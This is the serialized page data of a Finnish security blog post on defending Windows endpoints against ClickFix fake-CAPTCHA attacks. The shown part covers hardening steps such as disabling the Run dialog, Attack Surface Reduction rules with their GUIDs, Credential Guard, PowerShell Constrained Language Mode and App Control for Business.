",[836,837,838,842],"li",{},[839,840,841],"strong",{},"Näyttäkää oikeita houkuttimia:"," väärennettyjä ”Verify you are human” -valintaruutuja, ”selaimesi tarvitsee päivityksen”, ”dokumenttia ei voitu renderöidä, suorita tämä korjaus”, rikkinäisiä Teams- tai Zoom-audiokehotteita.",[836,844,845,848],{},[839,846,847],{},"Esittäkää leikepöytätemppu:"," näyttäkää, miten sivu ylikirjoittaa leikepöydän hiljaa.",[836,850,851,854],{},[839,852,853],{},"Tehkää ilmoittamisesta helppoa:"," nopeasti ja ilman syyttelyä.",[559,856,858],{"id":857},"suojauslayer-3-toiminnon-estäminen","Suojauslayer 3: toiminnon estäminen",[526,860,565],{},[526,862,863],{},"Tässä on pari tapaa koventaa järjestelmää, eikä yksikään niistä ole takuu. Aloittakaa Suorita-dialogin poistamisesta käytöstä, se poistaa Win+R-sisääntulopisteen. Microsoftin ClickFix-ohjeistus suosittelee sen poistamista käytöstä ”where it isn't necessary”. Se sulkee nimenomaisen Win+R-liitoshyökkäyksen, mutta vaihtoehtoiset käynnistyspinnat jäävät, esimerkiksi Explorerin osoiterivi ja Windows Terminal.",[526,865,866,867,870],{},"Voitte lisäksi koventaa Edgeä ",[580,868,869],{},"DefaultClipboardSetting","-asetuksella, joka estää JavaScriptiä kirjoittamasta leikepöydälle hiljaa.",[559,872,874],{"id":873},"suojauslayer-4-suorituksen-estäminen","Suojauslayer 4: suorituksen estäminen",[526,876,565],{},[526,878,879],{},"Ennen edistyneitä ominaisuuksia laittakaa perusasiat kuntoon. ClickFixin osalta se tarkoittaa:",[831,881,834,882,834,888,834,894,834,900],{"style":833},[836,883,884,887],{},[839,885,886],{},"Local Admin Reduction:"," poistakaa paikalliset administrator-oikeudet loppukäyttäjiltä siellä missä mahdollista, jotta koodin suorituksen vaikutus rajautuu.",[836,889,890,893],{},[839,891,892],{},"Endpoint Privilege Management (EPM):"," antakaa käyttäjien työskennellä peruskäyttäjinä ja korottakaa vain hyväksytyt sovellukset policy-sääntöjen kautta.",[836,895,896,899],{},[839,897,898],{},"UAC-kovennus:"," tarkistakaa Secure Desktop -enforcement, kehotteiden käyttäytyminen administratoreille ja peruskäyttäjille sekä asennusohjelmien tunnistus.",[836,901,902,905],{},[839,903,904],{},"Credential Guard:"," eristäkää NTLM-hashit, Kerberos-tiketit ja muu credential-materiaali virtualisointipohjaisella turvallisuudella, jotta credential-varkaus pysyy vaikeana silloinkin, kun hyökkääjä saa admin-oikeudet.",[526,907,908],{},"Nämä kontrollit vähentävät eskalaatiomahdollisuuksia, suojaavat credentialeja ja pakottavat least privilege -periaatteen. Raja tulee tässä: ne rajaavat sitä, mitä kompromentoinnin jälkeen tapahtuu. Ne eivät estä infostealeria peruskäyttäjän kontekstissa lukemasta käyttäjälle luettavissa olevia evästeitä, istuntotokeneita ja sovellusten credential-storeja.",[526,910,911],{},"Sitten Microsoft Defender. Defender AV voi tunnistaa toisen vaiheen payloadin, mutta vain oikeilla asetuksilla: kytkekää Cloud Protection päälle ja asettakaa suojaustaso arvoon High tai High+. AMSI, Antimalware Scan Interface, antaa sovellusten luovuttaa sisältöä ajonaikaisesti Defenderille tarkistettavaksi sen jälkeen kun se on purettu tai deobfuskoitu muistissa, mutta ennen kuin se suoritetaan. PowerShell käyttää AMSI:a haittakoodin tunnistamiseen, ja AMSI tarvitsee reaaliaikaisen suojauksen ja Behavior Monitoringin.",[526,913,914],{},"Vähintään viisi Attack Surface Reduction -sääntöä on ClickFixin kannalta relevanttia:",[597,916,918],{"style":917},"margin: 0.5rem 0 2rem; overflow-x: auto",[919,920,834,922,834,941],"table",{"style":921},"width:100%; border-collapse: collapse; font-size: 0.85rem",[923,924,925,926,834],"thead",{},"\n    ",[927,928,929,930,929,935,929,938,925],"tr",{},"\n      ",[931,932,934],"th",{"style":933},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Sääntö",[931,936,937],{"style":933},"GUID",[931,939,940],{"style":933},"ClickFix-relevanssi",[942,943,925,944,925,960,925,975,925,988,925,1001,834],"tbody",{},[927,945,929,946,929,951,929,957,925],{},[947,948,950],"td",{"style":949},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Estä mahdollisesti obfuskoitujen skriptien suoritus",[947,952,954],{"style":953},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[580,955,956],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[947,958,959],{"style":949},"Obfuskoidut tai koodatut skriptit suoritus- ja evaasiovaiheessa",[927,961,929,962,929,966,929,972,925],{},[947,963,965],{"style":964},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Estä JavaScriptiä tai VBScriptiä käynnistämästä ladattua suoritettavaa sisältöä",[947,967,969],{"style":968},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[580,970,971],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[947,973,974],{"style":964},"WSH, .js tai .vbs, jotka käynnistävät ladattuja payloadeja",[927,976,929,977,929,980,929,985,925],{},[947,978,979],{"style":949},"Salli suoritettavat tiedostot vain prevalenssi-, ikä- tai trusted-list-kriteerin perusteella",[947,981,982],{"style":953},[580,983,984],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[947,986,987],{"style":949},"Tuoreet tai harvinaiset levylle kirjoitetut executablet",[927,989,929,990,929,993,929,998,925],{},[947,991,992],{"style":964},"Estä suoritettava sisältö sähköpostiohjelmasta ja webmailista",[947,994,995],{"style":968},[580,996,997],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[947,999,1000],{"style":964},"Sähköpostilla toimitetut ClickFix-variantit",[927,1002,929,1003,929,1006,929,1011,925],{},[947,1004,1005],{"style":949},"Estä kaikkia Office-sovelluksia luomasta lapsiprosesseja",[947,1007,1008],{"style":953},[580,1009,1010],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[947,1012,1013],{"style":949},"Office-houkutinvariantit, jotka käynnistävät interpretereitä",[526,1015,1016],{},"Rullatkaa ASR ensin audit-tilassa, sitten pilottina, sitten block-tilassa. Tamper Protection on viimeinen linja: se estää hyökkääjää sammuttamasta teidän tunnistuksianne.",[526,1018,1019],{},"PowerShellissä itsessään vähennätte legacy-interpretereiden tuomaa riskiä. Identifioikaa ja poistakaa siellä missä se on toteutettavissa Windows PowerShell 2.0 ja legacy-VBScript-komponentit, joilta puuttuvat uudempien versioiden logging- ja security-ominaisuudet. Seuraava askel on Constrained Language Mode (CLM), joka rajoittaa PowerShellin käytettävissä olevia kielielementtejä ja estää monet skriptipohjaiset tekniikat. CLM:llä on robustia turva-arvoa vain silloin, kun system application control -policy pakottaa sen (App Control for Business); ympäristömuuttujan ja AppLockerin kautta toteutetut variantit ovat heikompia ja kierrettävissä. Ja monet järjestelmät tarvitsevat Full Language Modea toimiakseen, esimerkiksi ohjelmistojen deployment-tooling, minkä vuoksi CLM on usein toteutettavissa vain valituissa ympäristöissä.",[526,1021,1022],{},"Näin päädymme App Control for Businessiin (aiemmin WDAC). App Control pakottaa koodin integriteettipolicyn siitä, mitkä executablet, skriptit ja ajurit saavat ajaa. Strateginen asento on default-deny plus Microsoftin suosittelemat Block Rules, tunnettu LOLBin- ja bypass-estolista. App Control on myös oikea enforcement-polku PowerShellin CLM:lle. Script Enforcement estää MSHTA- ja MSXML-skriptihostit, pakottaa PowerShellin CLM:ään ja estää sallimattoman Windows Script Hostin käytön. Pari käyttäytymisfaktaa on tärkeää:",[831,1024,834,1025,834,1028,834,1031],{"style":833},[836,1026,1027],{},"Base Policyt, jotka luottavat Windowsiin, eivät estä luotettuja LOLBineja automaattisesti. Teidän täytyy mergetä Microsoftin suosittelemat Block Rules sisään, jotta tunnetut bypassit sulkeutuvat.",[836,1029,1030],{},"App Control ei estä allekirjoitetun powershell.exen tai cmd.exen käynnistymistä. Se rajoittaa sitä, mitä ne saavat tehdä (CLM, ei allekirjoittamatonta tai sallimatonta payloadia), eikä säätele cmd.exen, .batin tai .cmd:n sisältöä. Siksi se kerrostetaan ASR:n ja käynnistyksen kovennuksen kanssa, eikä käytetä yksinään.",[836,1032,1033],{},"Audit-tila ei ole neutraali: Script Enforcement estää auditissakin MSHTA:n ja MSXML:n suorituksen ja voi muuttaa PowerShellin CLM-käyttäytymistä. Siksi App Controlin täytyy auditissa olla ensimmäisestä käyttöönotosta lähtien pilotti- tai rengasrajattu, ei koskaan koko laitekannan laajuinen.",[526,1035,1036],{},"App Control on yksittäinen kontrolli, jolla on korkein confidence interpreter-, LOLBin- ja payloadin suoritusvaiheita vastaan, ja se pakottaa robustin CLM:n. Samalla se kantaa korkeimman deployment-kompleksisuuden ja korkeimman rollback-riskin, sillä virheellinen konfiguraatio estää suorituksen. Ottakaa se käyttöön hallittujen pilottirenkaiden kautta.",[559,1038,1040],{"id":1039},"missä-me-tulemme-kuvaan","Missä me tulemme kuvaan",[526,1042,565],{},[526,1044,1045,1046,811],{},"ClickFix on nopea, ja Microsoftin natiivit tunnistukset kattavat suurimman osan, mutta eivät kaikkea. CSOC-asiakkaillemme laajennamme kattavuutta jatkuvasti siellä, missä aukkoja ilmaantuu: suoritus Windows Terminalin kautta, RAT-vetoiset tuki-scamit ja post-compromise-käyttäytyminen. Jos haluatte tietää, missä teidän ympäristönne on, ",[1047,1048,1049],"a",{"href":276},"ottakaa yhteyttä",[1051,1052,1053],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":530,"searchDepth":531,"depth":531,"links":1055},[1056,1057,1058,1059,1060,1061,1062,1063,1064],{"id":561,"depth":531,"text":562},{"id":643,"depth":531,"text":644},{"id":655,"depth":531,"text":656},{"id":678,"depth":531,"text":679},{"id":790,"depth":531,"text":791},{"id":820,"depth":531,"text":821},{"id":857,"depth":531,"text":858},{"id":873,"depth":531,"text":874},{"id":1039,"depth":531,"text":1040},"post",{"lang":1067,"seoTitle":1068,"titleClass":1069,"date":1070,"categories":1071,"blogtitlepic":1073,"socialimg":1074,"customExcerpt":1075,"keywords":1076,"asideNav":1077,"published":325},"fi","ClickFix-hyökkäysten tunnistaminen ja estäminen: Win+R-liitostemppu","h2-font-size","2026-09-21",[1072],"Security","head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix tekee käyttäjästä oman hyökkääjänsä: väärennetty CAPTCHA, yksi copy-paste, ja haittakoodi ajaa muistissa ilman että mitään päätyy levylle. Miten Microsoft Defender tunnistaa hyökkäyksen, missä tunnistus tulee rajoilleen ja miten te suljette aukon RunMRU-huntilla ja neljällä suojauslayerilla.","ClickFix, ClickFix-hyökkäys, ClickFix-tunnistus, ClickFixin estäminen, Fake CAPTCHA, Win+R-hyökkäys, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASR-säännöt, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, Infostealer, LOLBin, PowerShell-kovennus",{"menuItems":1078},[1079,1082,1085,1088,1091,1094,1097,1100,1103],{"href":1080,"text":1081},"#clickfix-hyökkäysketju","Hyökkäysketju",{"href":1083,"text":1084},"#mitä-microsoft-defender-havaitsee","Mitä Defender havaitsee",{"href":1086,"text":1087},"#missä-natiivi-tunnistus-tulee-rajoilleen","Missä se takkuaa",{"href":1089,"text":1090},"#aukon-sulkeminen-runmru-hunt","Aukon sulkeminen",{"href":1092,"text":1093},"#suojauslayer-1-toimituksen-estäminen","Layer 1: toimitus",{"href":1095,"text":1096},"#suojauslayer-2-tempun-estäminen","Layer 2: temppu",{"href":1098,"text":1099},"#suojauslayer-3-toiminnon-estäminen","Layer 3: toiminto",{"href":1101,"text":1102},"#suojauslayer-4-suorituksen-estäminen","Layer 4: suoritus",{"href":1104,"text":1040},"#missä-me-tulemme-kuvaan","/posts/2026-09-21-clickfix-prevent-detect",{"title":553,"description":530},"posts/2026-09-21-clickfix-prevent-detect",[1109,1110,1111],"Defender","SOC","Endpoint Security","ITRWHdeMy3Yxx9BYvNEm0ljNIgCJKT0IQ0THS5tBZRg",[],{"id":1115,"extension":1116,"meta":1117,"stem":8,"__hash__":1127},"authors_data/authors.json","json",{"Fritz Zurhorst":1118,"Nadine Klein":1123},{"display_name":555,"avatar":1119,"permalink":1120,"linkedin":1121,"imageOffsetTop":1122},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":535,"avatar":1124,"permalink":1125,"twitter":1126,"linkedin":548,"imageOffsetTop":1122},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383984155]